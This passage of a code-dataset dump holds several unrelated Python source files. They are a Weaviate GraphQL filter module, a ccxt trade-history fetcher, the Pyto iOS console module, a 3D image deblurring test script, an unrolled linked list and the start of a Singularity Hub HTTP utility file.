{{{self.obj_id}: {self._content[self.obj_id]}'\n if 'certainty' in self._content:\n near_object += f' certainty: {self._content[\"certainty\"]}'\n return near_object + '} '\n\n\nclass Ask(Filter):\n \"\"\"\n Ask class used to filter weaviate objects by asking a question.\n \"\"\"\n\n def __init__(self, content: dict):\n \"\"\"\n Initialize a Ask class instance.\n\n Parameters\n ----------\n content : list\n The content of the `ask` clause.\n\n Raises\n ------\n TypeError\n If 'content' is not of type dict.\n ValueError\n If 'content' has key \"certainty\" but the value is not float.\n TypeError\n If 'content' has key \"properties\" but the type is not list or str.\n \"\"\"\n\n super().__init__(content)\n\n if 'question' not in content:\n raise ValueError('Mandatory \"question\" key not present in the \"content\"!')\n\n if not isinstance(content['question'], str):\n raise TypeError('\"question\" key value should be of the type str. Given: '\n + str(type(content[\"question\"])))\n\n if 'certainty' in content:\n _check_certainty_type(content[\"certainty\"])\n\n self._content = deepcopy(content)\n\n if 'properties' in content:\n if isinstance(content['properties'], str):\n self._content['properties'] = [content['properties']]\n elif not isinstance(content['properties'], list):\n raise TypeError(\"'properties' should be of type list or str! Given type: \"\n + str(type(content['properties'])))\n\n def __str__(self):\n ask = f'ask: {{question: \\\"{self._content[\"question\"]}\\\"'\n if 'certainty' in self._content:\n ask += f' certainty: {self._content[\"certainty\"]}'\n if 'properties' in self._content:\n ask += f' properties: {json.dumps(self._content[\"properties\"])}'\n return ask + '} '\n\n\nclass NearImage(Filter):\n \"\"\"\n NearObject class used to filter weaviate objects.\n \"\"\"\n\n def __init__(self, content: dict, ):\n \"\"\"\n Initialize a NearImage class instance.\n\n Parameters\n ----------\n content : list\n The content of the `nearImage` clause.\n\n Raises\n ------\n TypeError\n If 'content' is not of type dict.\n TypeError\n If 'content[\"image\"]' is not of type str.\n ValueError\n If 'content' has key \"certainty\" but the value is not float.\n \"\"\"\n\n super().__init__(content)\n\n if 'image' not in content:\n raise ValueError('\"content\" is missing the mandatory key \"image\"!')\n if not isinstance(content['image'], str):\n raise TypeError('the \"image\" value should be of type str, given '\n f'{type(content[\"image\"])}')\n\n if \"certainty\" in content:\n _check_certainty_type(content[\"certainty\"])\n\n self._content = deepcopy(content)\n\n\n def __str__(self):\n near_image = f'nearImage: {{image: {self._content[\"image\"]}'\n if 'certainty' in self._content:\n near_image += f' certainty: {self._content[\"certainty\"]}'\n return near_image + '} '\n\n\nclass Where(Filter):\n \"\"\"\n Where filter class used to filter weaviate objects.\n \"\"\"\n\n def __init__(self, content: dict):\n \"\"\"\n Initialize a Where filter class instance.\n\n Parameters\n ----------\n content : dict\n The content of the `where` filter clause.\n\n Raises\n ------\n TypeError\n If 'content' is not of type dict.\n ValueError\n If a mandatory key is missing in the filter content.\n \"\"\"\n\n super().__init__(content)\n\n if \"path\" in content:\n self.is_filter = True\n self._parse_filter(content)\n elif \"operands\" in content:\n self.is_filter = False\n self._parse_operator(content)\n else:\n raise ValueError(\"Filter is missing required fields `path` or `operands`.\"\n f\" Given: {content}\")\n\n def _parse_filter(self, content: dict) -> None:\n \"\"\"\n Set filter fields for the Where filter.\n\n Parameters\n ----------\n content : dict\n The content of the `where` filter clause.\n\n Raises\n ------\n ValueError\n If 'content' is missing required fields.\n \"\"\"\n\n if \"operator\" not in content:\n raise ValueError(\"Filter is missing required filed `operator`. \"\n f\"Given: {content}\")\n\n self.path = json.dumps(content[\"path\"])\n self.operator = content[\"operator\"]\n self.value_type = _find_value_type(content)\n self.value = content[self.value_type]\n\n def _parse_operator(self, content: dict) -> None:\n \"\"\"\n Set operator fields for the Where filter.\n\n Parameters\n ----------\n content : dict\n The content of the `where` filter clause.\n\n Raises\n ------\n ValueError\n If 'content' is missing required fields.\n \"\"\"\n\n if \"operator\" not in content:\n raise ValueError(\"Filter is missing required filed `operator`.\"\n f\" Given: {content}\")\n _content = deepcopy(content)\n self.operator = _content[\"operator\"]\n self.operands = []\n for operand in _content[\"operands\"]:\n self.operands.append(Where(operand))\n\n def __str__(self):\n if self.is_filter:\n gql = f'where: {{path: {self.path} operator: {self.operator} {self.value_type}: '\n if self.value_type in [\"valueInt\", \"valueNumber\"]:\n gql += f'{self.value}}}'\n elif self.value_type == \"valueBoolean\":\n bool_value = str(self.value).lower()\n gql += f'{bool_value}}}'\n elif self.value_type == \"valueGeoRange\":\n geo_value = json.dumps(self.value)\n gql += f'{geo_value}}}'\n else:\n gql += f'\"{self.value}\"}}'\n return gql + ' '\n\n operands_str = []\n for operand in self.operands:\n # remove the `where: ` from the operands and the last space\n operands_str.append(str(operand)[7:-1])\n operands = \", \".join(operands_str)\n return f'where: {{operator: {self.operator} operands: [{operands}]}} '\n\n\ndef _check_direction_clause(direction: dict) -> dict:\n \"\"\"\n Validate the direction sub clause.\n\n Parameters\n ----------\n direction : dict\n A sub clause of the Explore filter.\n\n Raises\n ------\n TypeError\n If 'direction' is not a dict.\n TypeError\n If the value of the \"force\" key is not float.\n ValueError\n If no \"force\" key in the 'direction'.\n \"\"\"\n\n if not isinstance(direction, dict):\n raise TypeError(f\"`move` clause should be dict but was {type(direction)}\")\n\n if ('concepts' not in direction) and ('objects' not in direction):\n raise ValueError(\"The 'move' clause should contain `concepts` OR/AND `objects`!\")\n\n if 'concepts' in direction:\n _check_concept(direction)\n if 'objects' in direction:\n _check_objects(direction)\n if not \"force\" in direction:\n raise ValueError(\"'move' clause needs to state a 'force'\")\n if not isinstance(direction[\"force\"], float):\n raise TypeError(f\"'force' should be float but was {type(direction['force'])}\")\n\n\ndef _check_concept(content: dict) -> None:\n \"\"\"\n Validate the concept sub clause.\n\n Parameters\n ----------\n content : dict\n An Explore (sub) clause to check for 'concepts'.\n\n Raises\n ------\n ValueError\n If no \"concepts\" key in the 'content' dict.\n TypeError\n If the value of the \"concepts\" is of wrong type.\n \"\"\"\n\n if \"concepts\" not in content:\n raise ValueError(\"No concepts in content\")\n\n if not isinstance(content[\"concepts\"], (list, str)):\n raise TypeError(f\"Concepts must be of type list or str, not {type(content['concepts'])}\")\n if isinstance(content[\"concepts\"], str):\n content[\"concepts\"] = [content[\"concepts\"]]\n\n\ndef _check_objects(content: dict) -> None:\n \"\"\"\n Validate the `objects` sub clause of the `move` clause.\n\n Parameters\n ----------\n content : dict\n An Explore (sub) clause to check for 'objects'.\n\n Raises\n ------\n ValueError\n If no \"concepts\" key in the 'content' dict.\n TypeError\n If the value of the \"concepts\" is of wrong type.\n \"\"\"\n\n if not isinstance(content[\"objects\"], (list, dict)):\n raise TypeError(f\"'objects' must be of type list or dict, not {type(content['objects'])}\")\n if isinstance(content[\"objects\"], dict):\n content[\"objects\"] = [content[\"objects\"]]\n\n for obj in content[\"objects\"]:\n if len(obj) != 1 or ('id' not in obj and 'beacon' not in obj):\n raise ValueError('Each object from the `move` clause should have ONLY `id` OR '\n '`beacon`!')\n\n\ndef _check_certainty_type(certainty: float) -> None:\n \"\"\"\n Check 'certainty\n\n Parameters\n ----------\n certainty : float\n Certainty value to check if it is of type float.\n \"\"\"\n\n if not isinstance(certainty, float):\n raise TypeError(\"certainty is expected to be a float but was \"\n f\"{type(certainty)}\")\n\n\ndef _find_value_type(content: dict) -> str:\n \"\"\"\n Find the correct type of the content.\n\n Parameters\n ----------\n content : dict\n The content for which to find the appropriate data type.\n\n Returns\n -------\n str\n The correct data type.\n\n Raises\n ------\n ValueError\n If missing required fields.\n \"\"\"\n\n if \"valueString\" in content:\n to_return = \"valueString\"\n elif \"valueText\" in content:\n to_return = \"valueText\"\n elif \"valueInt\" in content:\n to_return = \"valueInt\"\n elif \"valueNumber\" in content:\n to_return = \"valueNumber\"\n elif \"valueDate\" in content:\n to_return = \"valueDate\"\n elif \"valueBoolean\" in content:\n to_return = \"valueBoolean\"\n elif \"valueGeoRange\" in content:\n to_return = \"valueGeoRange\"\n else:\n raise ValueError(f\"Filter is missing required fields: {content}\")\n return to_return\n","sub_path":"weaviate/gql/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":17791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"439365596","text":"#!/usr/bin/env python3\nimport ccxt\nimport os, json, asyncio, logging\nfrom os.path import basename\nfrom ccxt import ExchangeError\nfrom database import Database\nfrom tabulate import tabulate\nfrom colorama import Fore\nfrom datetime import datetime, timezone\nfrom dateutil.relativedelta import relativedelta\n\nmarkets = {}\nhistories = []\n\nasync def load_exchange(exchange):\n #print(f\"loading {exchange}\")\n ex_obj = getattr(ccxt, exchange)\n ex = ex_obj()\n ex.enableRateLimit = True\n try:\n ex.load_markets()\n markets[exchange] = ex\n print(f\"{exchange} loaded.\")\n except:\n print(f\"{exchange} NOT loaded!\")\n await asyncio.sleep(0.01)\n\n\ndef main():\n print(\"Fetch History demo\")\n os.chdir(\"ccxt\")\n\n filename = os.path.splitext(basename(__file__))[0] + \".log\"\n logging.basicConfig(filename=filename, level=logging.INFO, format=u'%(filename)s:%(lineno)d %(levelname)-8s [%(asctime)s] %(message)s')\n db = Database(os.getcwd() + \"\\\\database.ini\")\n #filename = os.path.splitext(__file__)[0] + \".log\"\n\n exchanges_list = db.query(\"select distinct exchange from mem.exchanges_pairs with (snapshot) where enabled=1\")['exchange'].tolist()\n\n tasks = [load_exchange(exchange) for exchange in exchanges_list]\n loop = asyncio.get_event_loop()\n loop.run_until_complete(asyncio.wait(tasks))\n loop.close()\n\n #exchanges = db.query(\"select id from exchanges where enabled=1\")['id'].tolist()\n pairs = db.query(\"select exchange, pair from mem.exchanges_pairs with (snapshot) where enabled=1\")\n\n # exchanges = ['binance','huobipro','bittrex','cryptopia','exmo','hitbtc2','kraken','okex','poloniex','yobit']\n # pair = \"ETH/USDT\"\n limit = 100\n\n # dt = datetime.strptime('01.09.2018 15:30:25', '%d.%m.%Y %H:%M:%S')\n # ts = int(dt.replace(tzinfo=timezone.utc).timestamp())\n # since = ts *1000\n # print(f\"Selected pair: {pair}, start date: {dt.strftime('%d.%m.%Y %H:%M:%S')} [since={since}]\\n\")\n\n for _, row in pairs.iterrows():\n exchange, pair = row\n print(f\"Fetching history for {exchange}/{pair}\")\n \n if exchange not in markets:\n continue\n\n market = markets[exchange]\n\n sql = f\"select timestamp from v_last_ts where exchange='{exchange}' and pair='{pair}'\"\n\n dt = datetime.utcnow() - relativedelta(months=1) # month ago from now\n try:\n since_db = int(db.query(sql).values[0])+1\n except:\n pass\n since_1m = int(dt.replace(tzinfo=timezone.utc).timestamp())*1000\n since = max(since_db, since_1m) # \n\n try:\n histories = market.fetch_trades(symbol=pair, since=since, limit=limit)\n \n except ExchangeError: # Please specify a time window of no more than 1 month.\n pass\n # pair = pair.split(\"/\")[0]+\"/USD\" if pair.split(\"/\")[1]==\"USDT\" else pair.split(\"/\")[0]+\"/USDT\"\n # histories = market.fetch_trades(symbol=pair, since=since, limit=limit)\n except Exception as e:\n print(f\"Error in {filename}.fetch_trades(). {Fore.YELLOW}{e}{Fore.RESET}\")\n logging.info(f\"fetch_trades({exchange}/{pair}) FAILED!\")\n \n if histories != []:\n try:\n for row in histories: # remove info row from result set\n del row['info']\n except:\n pass\n\n history = { 'exchange': exchange,\n 'pair': pair,\n 'histories': histories\n } \n try:\n db.execute(\"mem.save_history_json\", json.dumps(history))\n except Exception as e:\n print(f\"Error in {filename}.mem.save_history_json(). {Fore.YELLOW}{e}{Fore.RESET}\")\n logging.info(f\"fetch_trades({exchange}/{pair}) FAILED!\")\n else:\n # search for acceptable since value\n since += 1000 # increment by a second\n logging.info(f\"fetch_trades({exchange}/{pair}) returned empty dataset, next ts={since}\")\n\n # status = \"WORKS\" if str(histories[0]['timestamp'])[:4] == str(since)[:4] else \"DOESN'T WORK!\"\n # print(f\"dt=[{histories[0]['datetime']}], ts=[{histories[0]['timestamp']}], price={histories[0]['price']} -- {status}\")\n # histories = []\n\nif __name__ == '__main__':\n main()","sub_path":"ccxt_demo/fetch_trades_since.py","file_name":"fetch_trades_since.py","file_ext":"py","file_size_in_byte":4357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"45703845","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThis module gives access to the console.\n\"\"\"\n\nif __host__ is not widget:\n from rubicon.objc import *\n from code import interact\n import stopit\n import pdb\n\nif __platform__ is iOS:\n import _codecompletion\n from pyto import *\n from pyto import __isMainApp__\n import os\n if __host__ is not widget:\n import builtins\n\nif __platform__ is macOS:\n import builtins\n\nimport importlib.util\nimport os\nimport sys\nimport traceback\nimport threading\nimport time\n\ndef __runREPL__():\n \n if __host__ is widget:\n return\n \n sys.argv = ['']\n \n Python.shared.isScriptRunning = True\n\n interact()\n\n# MARK: - Running\n\n__script__ = None\n\n__is_loop_running__ = False\n\n__i__ = 0\n\n__breakpoints__ = []\n\n__are_breakpoints_set__ = True\n\ndef run_script(path, replMode=False, debug=False, breakpoints=[]):\n \"\"\"\n Run the script at given path catching exceptions.\n \n This function should only be used internally by Pyto.\n \n Args:\n path: The path of the script.\n replMode: If set to `True`, errors will not be handled.\n debug: Set to `True` for debugging.\n breakpoints: Lines to break if debugging.\n \"\"\"\n \n if __platform__ is iOS:\n \n python = Python.shared\n \n currentDir = \"\"\n try:\n currentDir = str(python.currentWorkingDirectory)\n except:\n currentDir = os.path.expanduser(os.path.dirname(path))\n \n os.environ = {}\n for (key, value) in python.environment.items():\n os.environ[str(key)] = str(value)\n \n sys.argv = [path]\n for arg in python.args:\n if arg != \"\":\n sys.argv.append(str(arg))\n\n d=os.path.expanduser(\"~/tmp\")\n filesToRemove = [os.path.join(d,f) for f in os.listdir(d)]\n for f in filesToRemove:\n try:\n os.remove(f)\n except PermissionError:\n pass\n \n def run() -> None:\n \n if __platform__ is iOS:\n pip_directory = os.path.expanduser(\"~/Documents/modules\")\n Python.shared.isScriptRunning = True\n os.chdir(currentDir)\n try:\n sys.path.remove(pip_directory)\n except:\n pass\n sys.path.insert(-1, currentDir)\n sys.path.insert(-1, pip_directory)\n \n try:\n global __script__\n spec = importlib.util.spec_from_file_location(\"__main__\", path)\n __script__ = importlib.util.module_from_spec(spec)\n\n if debug and __platform__ is iOS and __host__ is not widget:\n \n try:\n console\n except:\n import console\n \n console.__are_breakpoints_set__ = False\n console.__breakpoints__ = breakpoints\n \n console.__i__ = -1\n\n old_input = input\n \n def debugger_input(prompt):\n \n try:\n console\n except:\n import console\n \n if not console.__are_breakpoints_set__:\n \n breakpoints = console.__breakpoints__\n console.__i__ += 1\n \n if len(breakpoints) < console.__i__:\n console.__are_breakpoints_set__ = True\n return \"\"\n \n try:\n breakpoints[console.__i__+1]\n except:\n console.__are_breakpoints_set__ = True\n \n return \"b \"+str(breakpoints[console.__i__])\n else:\n console.__should_inspect__ = True\n return old_input(prompt)\n \n if len(breakpoints) > 0:\n builtins.input = debugger_input\n \n pdb.main([\"pdb\", path])\n builtins.input = old_input\n else:\n spec.loader.exec_module(__script__)\n except SystemExit:\n pass\n except KeyboardInterrupt:\n pass\n except Exception as e:\n \n if __platform__ is iOS and not __isMainApp__() or replMode:\n print(traceback.format_exc())\n if not replMode:\n Python.shared.fatalError(str(e))\n else:\n exc_type, exc_obj, exc_tb = sys.exc_info()\n \n extracts = traceback.extract_tb(sys.exc_info()[2])\n count = len(extracts)\n \n lineNumber = -1\n \n fileName = path\n for i, extract in enumerate(extracts):\n if extract[0] == fileName:\n lineNumber = extract[1]\n break\n count -= 1\n \n if (type(e) == SyntaxError): # The last word in a `SyntaxError` exception is the line number\n lineNumber = [int(s) for s in (str(e)[:-1]).split() if s.isdigit()][-1]\n\n if __platform__ is iOS:\n Python.shared.errorType = exc_type.__name__\n Python.shared.errorReason = str(e)\n for console in ConsoleViewController.visibles:\n if console.editorSplitViewController.editor.document.fileURL.path != path:\n continue\n console.editorSplitViewController.editor.showErrorAtLine(lineNumber)\n elif __platform__ is macOS:\n sys.stderr.write(\"Pyto.error_at_line;\"+str(lineNumber)+\";\")\n\n error = traceback.format_exc(limit=-count)\n\n if __platform__ is iOS:\n PyOutputHelper.printError(error)\n sys.path.remove(currentDir)\n else:\n sys.stderr.write(error+\"\\n\")\n\n if debug:\n pdb.post_mortem(exc_tb)\n\n if __platform__ is iOS and __isMainApp__():\n \n EditorViewController.runningLine = 0\n \n ConsoleViewController.enableDoneButton()\n \n ReviewHelper.shared.launches = ReviewHelper.shared.launches+1\n ReviewHelper.shared.requestReview()\n\n thread = threading.Thread(target=run, args=())\n \n def interruption_loop():\n while thread.isAlive():\n sys.__stdout__.write(str(Python.shared._isScriptRunning)+\"\\n\")\n if not Python.shared._isScriptRunning or Python.shared._interrupt:\n target_tid = 0\n for tid, tobj in threading._active.items():\n if tobj is thread:\n found = True\n target_tid = tid\n break\n \n if Python.shared._interrupt:\n stopit.async_raise(target_tid, KeyboardInterrupt)\n elif not Python.shared._isScriptRunning:\n stopit.async_raise(target_tid, SystemExit)\n \n Python.shared._interrupt = False\n \n if thread.isAlive:\n Python.shared._isScriptRunning = True\n \n time.sleep(1)\n \n if __platform__ is iOS:\n Python.shared.isScriptRunning = True\n Python.shared._isScriptRunning = True\n \n if __platform__ is iOS:\n thread.start()\n else:\n run()\n\n if __host__ is not widget and __platform__ is iOS:\n interruption_loop()\n\n if __platform__ is iOS:\n sys.__stdout__.write(\"Execution finished\\n\")\n\n if __platform__ is iOS:\n Python.shared._isScriptRunning = False\n Python.shared.isScriptRunning = False\n\n sys.path = list(dict.fromkeys(sys.path))\n\n return __script__\n\n# MARK: - I/O\n\nignoredThreads = []\n\"\"\"\nAll output and input request from these threads will be ignored.\n\"\"\"\n\ndef __consoles__():\n if __platform__ is iOS and __host__ is widget:\n return [ConsoleViewController.visible]\n elif __platform__ is iOS:\n return ConsoleViewController.visibles\n else:\n return\n\ndef clear():\n \"\"\"\n Clears the console.\n \"\"\"\n \n if threading.current_thread() in ignoredThreads:\n return\n \n if __platform__ is macOS:\n print(\"Pyto.console.clear\")\n else:\n for console in __consoles__():\n console.clear()\n time.sleep(0.1)\n\nif __platform__ is iOS:\n __PyInputHelper__ = PyInputHelper\n\ndef input(prompt=\"\"):\n \"\"\"\n Requests input with given prompt.\n \n Args:\n prompt: Text printed before the user's input without a newline.\n \"\"\"\n \n if __platform__ is macOS:\n return builtins.input(prompt)\n \n if __host__ is widget:\n return None\n \n NSBundle = ObjCClass(\"NSBundle\")\n if NSBundle.mainBundle.bundlePath.pathExtension == \"appex\":\n return None\n \n __PyInputHelper__.userInput = None\n \n __PyInputHelper__.showAlertWithPrompt(prompt)\n \n while __PyInputHelper__.userInput == None or threading.currentThread() in ignoredThreads:\n time.sleep(0.2)\n \n userInput = __PyInputHelper__.userInput\n __PyInputHelper__.userInput = None\n \n return str(userInput)\n\ndef print(*objects, sep=None, end=None):\n \"\"\"\n Prints to the Pyto console, not to the stdout. Works as the builtin `print` function but does not support printing to a custom file. Pyto catches by default the stdout and the stderr, so use the builtin function instead. This function is mainly for internal use.\n \"\"\"\n \n if __platform__ is macOS:\n return builtins.print(objects, sep=sep, end=end)\n \n if sep is None:\n sep = ' '\n if end is None:\n end = '\\n'\n array = map(str, objects)\n PyOutputHelper.print(sep.join(array)+end)\n\n# MARK: - Alerts\n\nif __host__ is not widget:\n\n if __platform__ is iOS:\n PyAlert = PyAlert\n \"\"\"\n A class representing an alert.\n\n Example:\n\n alert = console.Alert.alertWithTitle(\"Hello\", message=\"Hello World!\")\n alert.addAction(\"Ok\")\n alert.addCancelAction(\"Cancel\")\n if (alert.show() == \"Ok\"):\n print(\"Good Bye!\")\n \"\"\"\n\n class Alert:\n \"\"\"\n A wrapper of `PyAlert` Objective-C class on iOS and `NSAlert` on macOS that represents an UI alert.\n \"\"\"\n \n if __platform__ is iOS:\n pyAlert = None\n \"\"\"\n The Objective-C representation.\n \"\"\"\n elif __platform__ is macOS:\n nsAlert = None\n \"\"\"\n The Objective-C representation.\n \"\"\"\n \n def __init__(self):\n \n if __platform__ is iOS:\n self.pyAlert = PyAlert.alloc().init()\n elif __platform__ is macOS:\n from ctypes import cdll\n cdll.LoadLibrary(\"/System/Library/Frameworks/Cocoa.framework/Versions/Current/Cocoa\")\n self.nsAlert = ObjCClass(\"NSAlert\").alloc().init()\n \n @staticmethod\n def alertWithTitle(title, message):\n \"\"\"\n Creates an alert.\n \n Args:\n title: The title of the alert.\n message: The message of the alert.\n \"\"\"\n \n alert = Alert()\n if __platform__ is iOS:\n alert.pyAlert.title = title\n alert.pyAlert.message = message\n elif __platform__ is macOS:\n alert.nsAlert.informativeText = title\n alert.nsAlert.messageText = message\n return alert\n \n __actions__ = []\n\n def addAction(self, title):\n \"\"\"\n Add an action with given title.\n \n Args:\n title: The title of the action.\n \"\"\"\n \n if __platform__ is iOS:\n self.pyAlert.addAction(title)\n else:\n self.nsAlert.addButtonWithTitle_(title)\n self.__actions__.append(title)\n \n def addDestructiveAction(self, title):\n \"\"\"\n Add a destructive action with given title.\n \n Args:\n title: The title of the action.\n \"\"\"\n \n if __platform__ is macOS:\n raise NotImplementedError(\"`addDestructiveAction` cannot be used on macOS. Use `addAction`.\")\n \n self.pyAlert.addDestructiveAction(title)\n\n def addCancelAction(self, title):\n \"\"\"\n Add a cancel action with given title. Can only added once.\n \n Args:\n title: The title of the action.\n \"\"\"\n \n if __platform__ is macOS:\n raise NotImplementedError(\"`addCancelAction` cannot be used on macOS. Use `addAction`.\")\n \n if not self.pyAlert.addCancelAction(title):\n raise ValueError(\"There is already a cancel action.\")\n \n def show(self):\n \"\"\"\n Shows alert.\n \n Returns the title of the selected action.\n \"\"\"\n \n if __platform__ is iOS:\n return self.pyAlert._show()\n elif __platform__ is macOS:\n \n def order_front():\n time.sleep(0.1)\n self.nsAlert.window.orderFrontRegardless()\n \n threading.Thread(target=order_front).start()\n \n return self.__actions__[self.nsAlert.runModal()-1000]\n\nelse:\n PyAlert = None\n Alert = None\n\n__all__ = [\"Alert\", \"clear\", \"print\", \"input\"]\n","sub_path":"site-packages/console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":14137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"413184820","text":"import warnings\nimport multiprocessing as mp\nimport time\nimport numpy as np\nfrom scipy.io import loadmat\nwarnings.filterwarnings(\"ignore\")\n\nfrom BP3MG.PAR3MG_MPI import PAR3MG_MPI\nfrom PSF_tools.gaussian_kernel_3D import gaussian_kernel_3D\nfrom BD3MG.blur_alt_z import blur_alt_z\nfrom BD3MG.adjblur_alt_z import adjblur_alt_z\n\n\n#Loading image\nI = loadmat(os.getcwd() + '/Images/FlyBrain.mat')['I']\nNx = 128\nNy = Nx\nNz = 24\nsli = slice(0,256,int(256/Nx))\nI = I[sli,sli,:Nz]\n\nprint('Create blurry and noisy image')\nprint('size image: Nx = ', Nx, ', Ny = ', Ny, ', Nz = ',Nz)\n\n#Degradation parameters\nNh = np.array([5,5,11]).astype(int)\nSx = np.random.rand(Nz, 1) * 3\nSy = np.random.rand(Nz, 1) * 3\nSz = np.random.rand(Nz, 1) * 4\nPhiy = np.random.rand(Nz, 1) * 2 * np.pi * 0\nPhiz = np.random.rand(Nz, 1) * 2 * np.pi\n\n\n#getting convolution kernel\ndef h(z):\n return gaussian_kernel_3D(((Nh-1)/2).astype(int), [Sx[z], Sy[z], Sz[z]], [Phiy[z], Phiz[z]])\nprint('size kernel: Nx = {}, Ny = {}, Nz = {}'.format(*h(0).shape))\n\n#SNR = 20;\nsigma = 0.02\n\n#add blur and noise in a parrallel fashion\nstart = time.time()\npool = mp.Pool(mp.cpu_count())\nresults = [pool.apply(blur_alt_z, args=(I, Nh, Nx, Ny, Sx, Sy, Sz, Phiy, Phiz, sigma, z)) for z in range(Nz)]\npool.close()\n\nIblurnoisy, Iblurz, BSNRinitz, SNRinitz = zip(*results)\nIblurnoisy = np.dstack(Iblurnoisy)\nIblur = np.dstack(Iblurz)\n\n\ncpu_time_blur = time.time()-start\n\nSNRinit = 10*np.log10(np.sum(I**2)/np.sum((I-Iblurnoisy)**2))\nBSNRinit = 10*np.log10(np.sum(I**2)/np.sum((I-Iblur)**2))\nprint('SNR init = ', str(SNRinit),', BSNRinit = ', str(BSNRinit))\n\n\ny = Iblurnoisy.reshape(Nx*Ny, Nz)\n#we need these vectors in the algorithm\n\npool = mp.Pool(mp.cpu_count())\nresults = [pool.apply(adjblur_alt_z, args=(Iblurnoisy, z, Nh, Nx, Ny, Nz, Sx, Sy, Sz, Phiy, Phiz)) for z in range(Nz)]\npool.close()\n\nHty, H1Z = zip(*results)\nHty= np.dstack(Hty)\nH1 = np.dstack([H1Z[z][:,:,z] for z in range(len(H1Z))])\n\n\nprint('Elapsed time : ', cpu_time_blur)\nprint('done')\n\n\nTimemax = 600\nNbIt = 10000 #Max iterations number\n#Regularization parameters:\nlambda_ = 1\ndelta = 2\nphi = 4\n#Bounds of the constrained domain:\nxmin = 0\nxmax = 1\n#Elastic net parameter:\ntau = 1e-3\n#Weight of the quadratic distance function :Gradz\neta = 0.1\n#Initialization\nx0 = np.zeros((Nx, Ny, Nz))\n\n\nTimes = {}\nTimesending ={}\nCrits = {}\nratio = {}\nSNR = {}\ncores=mp.cpu_count()\n\n\nBMMD = PAR3MG_MPI(y, h, Hty, H1, eta, tau, lambda_, delta, xmin, xmax, phi, x0, I, Nx, Ny, Nz, NbIt, cores, Timemax)\nBMMD.optimize()\nCrits[cores] = BMMD.Crit\nTimes[cores] = np.cumsum(BMMD.Time)\nSNR[cores] = BMMD.SNR\n\n\nf = open(\"Times.txt\",\"w\")\nf.write( str(Times) )\nf.close()\n\nf = open(\"Crits.txt\",\"w\")\nf.write( str(Crits) )\nf.close()\n\nf = open(\"SNR.txt\",\"w\")\nf.write( str(SNR) )\nf.close()\n\n","sub_path":"BD3MG/BP3MG/Test_synch.py","file_name":"Test_synch.py","file_ext":"py","file_size_in_byte":2779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"19333091","text":"\nclass Node:\n def __init__(self, max_size, next=None):\n self.el_num = 0\n self.elements = [None] * max_size\n self.next = next\n\nclass UnrolledLinkedList:\n def __init__(self, node_size):\n self._node_size = node_size\n self._head = Node(node_size, None)\n\n def append(self, data):\n node = self._head\n while node.next is not None:\n node = node.next\n\n if node.el_num == self._node_size:\n new_node = Node(self._node_size, node.next)\n node.next, node = new_node, new_node\n\n node.elements[node.el_num] = data\n node.el_num += 1\n\n def delete(self, predicate):\n node = self._head\n while node is not None:\n for i in range (0, node.el_num):\n if predicate(node.elements[i]):\n while i + 1 < node.el_num:\n node.elements[i], i = node.elements[i+1], i + 1\n node.el_num -= 1\n node = node.next\n\n def shrink(self):\n node = self._head\n new_node = self._head = Node(self._node_size)\n while node is not None:\n for i in range(node.el_num):\n if new_node.el_num == self._node_size:\n new_node.next = Node(self._node_size)\n new_node = new_node.next\n new_node.elements[new_node.el_num] = node.elements[i]\n new_node.el_num += 1\n node = node.next\n\n def __str__(self):\n node, sr = self._head, ''\n while node is not None:\n sr += '['\n for i in range(0, node.el_num):\n sr += str(node.elements[i])\n sr += ',' if i != node.el_num - 1 else ']'\n node = node.next\n if node is not None:\n sr += ' -> '\n return sr\n\nif __name__ == '__main__':\n lst = UnrolledLinkedList(4)\n\n print('\\ncreate:')\n for i in range(22):\n lst.append(i)\n print(lst)\n\n print('\\ndelete:')\n lst.delete(lambda x: x % 2 == 0)\n print(lst)\n\n print('\\nshrink:')\n lst.shrink()\n print(lst)","sub_path":"data-structures/list/unrolled-linked-list.py","file_name":"unrolled-linked-list.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"557067610","text":"#!/usr/bin/env python\n\n'''\nutils.py: general http functions (utils) for som api\n\nThe MIT License (MIT)\n\nCopyright (c) 2016-2017 Vanessa Sochat\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\n\n'''\n\nfrom singularity.logman import bot\nfrom singularity.hub.auth import get_headers\n\nimport requests\nimport os\nimport tempfile\nimport sys\n\ntry:\n from urllib.error import HTTPError\nexcept ImportError:\n from urllib2 import HTTPError\n\n\ndef paginate_get(url,headers=None,token=None,data=None,return_json=True,stream_to=None,\n start_page=None):\n '''paginate_get is a wrapper for api_get to get results until there isn't an additional page\n '''\n if start_page == None:\n url = '%s&page=1' %(url)\n else:\n url = '%s&page=%s' %(url,start_page)\n\n results = []\n while url is not None:\n result = api_get(url)\n if 'results' in result:\n results = results + result['results']\n url = result['next']\n return results\n \n\n\ndef api_get(url,headers=None,token=None,data=None, return_json=True, stream_to=None):\n '''api_get will use requests to get a particular url\n :param url: the url to send file to\n :param headers: a dictionary with headers for the request\n :param putdata: additional data to add to the request\n :param return_json: return json if successful\n 